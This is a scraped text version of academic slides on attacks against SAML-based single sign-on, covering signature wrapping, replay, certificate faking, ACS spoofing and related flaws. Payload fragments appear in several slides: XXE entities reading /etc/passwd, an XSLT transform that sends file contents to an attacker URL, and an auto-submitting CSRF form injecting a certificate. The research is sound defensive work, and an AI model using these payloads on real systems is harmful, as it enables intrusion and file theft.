Practical Security Evaluation of SAML-based Single Sign-On Solutions

Size: px

Start display at page:

Download "Practical Security Evaluation of SAML-based Single Sign-On Solutions"

Percival Dawson
10 years ago
Views:

1 Practical Security Evaluation of SAML-based Single Sign-On Solutions Vladislav Mladenov, Andreas Mayer, Marcus Niemietz, Christian Mainka, Florian Feldmann, Julian Krautwald, Jörg Schwenk 1

2 Single Sign-On Attacks on SPs Attacks on IdPs Future Work 2

3 Single Sign-On Username/Password 3 User 3

4 Single Sign-On Service Provider 1 Service Provider 2 Username/ Password Token Token Service Provider 3 Identity Provider User Service Provider 4 Service Provider 5 4

5 Single Sign-On Identity Provider Client Service Provider GET Resources Token Request Token Request Authentifizierung Token Token Resources [TLS] [TLS] 5

6 Login Architecture Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Database 6

7 Login Architecture Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 7

8 Single Sign-On Attacks on SPs Attacks on IdPs Future Work 8

9 Attacks on SPs Identity Provider Client Service Provider 1. GET Resources 3. Token Request 2. Token Request 4. Authentifizierung 5. Token 6. Token 7. Resources [TLS] [TLS] 9

10 Goals Unauthorized access to restricted resources on the SP Security relevant parameters in the token: Timestamps/Nonces Information about the authenticated subject Information about the recipient of the token Information about the issuer of the token Signature/HMAC Keys 10

11 Replay Attacks Requirements: The attacker has a valid token How it works: The attacker reuses the token for infinite amount of time Success if: An expired token is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ds:key ID=111 Ref=111 11

12 Replay Attacks Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 12

13 Signature Exclusion Requirements: No requirements How it works: The attacker creates a token Success if: An unsigned token is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ID=111 Ref=111 ds:key 13

14 Signature Exclusion Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 14

15 Certificate Faking Requirements: No requirements How it works: The attacker creates a token and signs it with his private key Success if: A token signed with an untrusted key is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ds:key ID=111 Ref=111 15

16 Certificate Faking Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 16

17 Token Recipient Confusion Requirements: The attacker has a valid token for a ServiceA ServiceA and ServiceB trust the same IdP How it works: The sends the token to ServiceB Success if: ServiceB accepts the token generated for ServiceA saml:response saml:assertion saml:subject Bob saml:conditions timestamps Recipient=SA saml:signature ID=111 Ref=111 ds:key 17

18 Token Recipient Confusion Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 18

19 XML Signature Wrapping Requirements: The attacker has a valid token How it works: The attacker injects malicious content in the token without invalidating the signature Success if: The token is successfuly verified and the malicious content is processed saml:response saml:assertion saml:subject Bob Admin saml:signature ds:key saml:assertion saml:subject ID=111 ID=666 Ref=111 ID=111 Bob 19

20 XML Signature Wrapping Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 20

21 XE XML Entity <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " <html> <head> <title>xe</title> </head> <body> 2 < 3 2 < 3 </body> </html> 25 21

22 XE XML Entity <!DOCTYPE foo [ <!ENTITY name "Bob" > ]> <Envelope> <Body> <order> <name>&name;</name> </order> </Body> </Envelope> Client <Envelope> <Body> Thank you Bob </Body> </Envelope> Server 25 22

23 XXE XML External Entity Attacks <!DOCTYPE order [<!ENTITY name SYSTEM c:\boot.ini >]> <Envelope> <Body> <order> <name>&name;</name> <product>computer</product> </order> </Body> </Envelope> Client <Envelope> <Body> Thank you [ c:\boot.ini ] </Body> </Envelope> Server Envelope Body order name [C:\boot.ini] 26 23

24 XML External Entity (XXE) Requirements: No requirements How it works: The attacker sends malicious XML content to the SP Success if: The attacker can access resources stored on the filesystem of the SP <? xml version = " 1.0 " encoding = " utf 8"? > <!DOCTYPE Response[ <!ENTITY file SYSTEM "/etc/passwd" > <!ENTITY send SYSTEM " > ]> <samlp:response> < attack>&send;</attack> </samlp:response> 24

25 XML External Entity (XXE) Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 25

26 XSLT Requirements: No requirements How it works: The attacker sends malicious XML content to the SP Success if: The attacker can access resources stored on the filesystem of the SP saml:response saml:assertion ds:signature ds:transform <xsl:stylesheet xmlns:xsl="..."> <xsl:template match="doc"> <xsl:variable name="file select="unparsed-text('/etc/passwd')"/> <xsl:variable name="escaped select="encode-for-uri($file)"/> <xsl:variable name="attackerurl select="' <xsl:variable name="exploiturl select="concat($attackerurl,$escaped)"/> <xsl:value-of select="unparsed-text($exploiturl)"/> </xsl:template> </xsl:stylesheet> XSLT Payload 26

27 XSLT Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 27

28 Certificate Injection Cross-site-request-frogery (CSRF) Host: bank.com Path: Parameters: name=rub iban=1111 payment=20 28

29 Certificate Injection Cross-site-request-frogery (CSRF) Host: bank.com Path: Parameters: name=evil iban=666 payment=200 29

30 Certificate Injection Requirements: No requirements How it works: The attacker sends valid token signed with his private key Success if: The token is successfully verified 30

31 Certificate Injection Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Database 31

32 Certificate Injection <html> <head></head> <body onload="document.forms[0].submit()"> <form method="post" enctype="multipart/form-data" action=" <input type="text" name="mode" value="samlupdate" /> <input type="text" name="samlfname" value="" /> <input type="text" name="bizcpn" value= XSRF TOKEN EINSETZEN! (nicht validiert)" /> <input type="text" name="samlloginurl" value= SAML LOGIN URL EINSETZEN!" /> <input type="text" name="samllogouturl" value= SAML LOGOUT URL EINSETZEN!" /> <input type="text" name="chpasswdurl" value= PASSWORD CHANGE URL EINSETZEN!" /> <input type="file" name="samlupload" value="" /> <input type="text" name="publickey" value= ENCODIERTES ZERTIFIKAT EINSETZEN!" /> <input type="text" name="algorithm" value="rsa" /> </form></body></html> 32

33 Single Sign-On Attacks on SPs Attacks on IdPs Future Work 35

34 Attacks on IdPs Identity Provider Client Service Provider GET Resources Token Request Token Request Authentifizierung Token Token Resources [TLS] [TLS] 36

35 Attacks on IdPs Username/ Password Token Token Identity Provider User 37

36 ACS Spoofing Identity Provider Client Attacker Service Provider GET Resources Token Request GET Resources Token Request Token Request Authentifizierung Token Token Token [TLS] [TLS] Resources [TLS] 38

37 ACS Spoofing T%2BMwEIbvSPwHy%2Fd8tMvHympSdUGISuw S0cCBm%2BtMUwfbk%2FU4zfLvSVMq2Euv45n 3fd7xzOb%2FrGE78KTRZXwSp5yBU1hpV2f8ub ylfvj5fn42i2lnkxzd2lon%2bnsbbtzmohljq8 Y77wRK0iSctEAiKLFa%2FH4Q0zgVrceACg1ny9 umy7rcdam2%2bs0bwrtppk2uadeovjw2ruq1b evgimcvr6zphmtj1mhsuzaudku0vy7si2h6v U5%2BiMuJuLx65az4dPql3SHBKaz1oYnEfVkW UfG4KkeBna7A%2Fxm6M14j1gZihZazBRH4MO DcoKPOgl%2BB32kFz08PGd%2BG0JJIkr7v46% 2BhRCaEpod17DCRivYZCkmkd4N28B3wfNyrG KP5bws9DS6PKDz%2FMpsl36Tyz%2F%2Fax1j efmi0emcly7c%2f8sdd0z7dobcynhbbv3qvb czw0tlqqemnhoqzjd%2b4%2fn8yw7l8aa%3 D%3D <samlp:authnrequest ID="agdobjcfikneommfjamdclenj" Version="2.0" IssueInstant=" T9:30:00Z" AssertionConsumerServiceURL= " <saml:issuer> </saml:issuer> </samlp:authnrequest> 39

38 XSS/CSRF/Clickjacking Identity Provider Client ( ) Authentifizierung Session Cookie Token Token [TLS] 40

39 XSS/CSRF/Clickjacking Identity Provider Client Attacker ( ) Authentifizierung Session Cookie Session Cookie Token Session Cookie Token 41

40 Single Sign-On Attacks on SPs Attacks on IdPs Future Work 43

41 Penetration Tests New methods for penetration tests of SSO systems are needed New tools should be developed SAML attacker OpenID attacker ACSScanner TLS channel bindings Holder-of-Key TLS-Unique SLSOP 44

42 Questions!? 45

Automatic Recognition, Processing and Attacking of Single Sign-On Protocols with Burp Suite

Automatic Recognition, Processing and Attacking of Single Sign-On Protocols with Burp Suite Vladislav Mladenov, Tim Guenther, Christian Mainka, Horst-Görtz Institut für IT-Sicherheit, Ruhr-Universität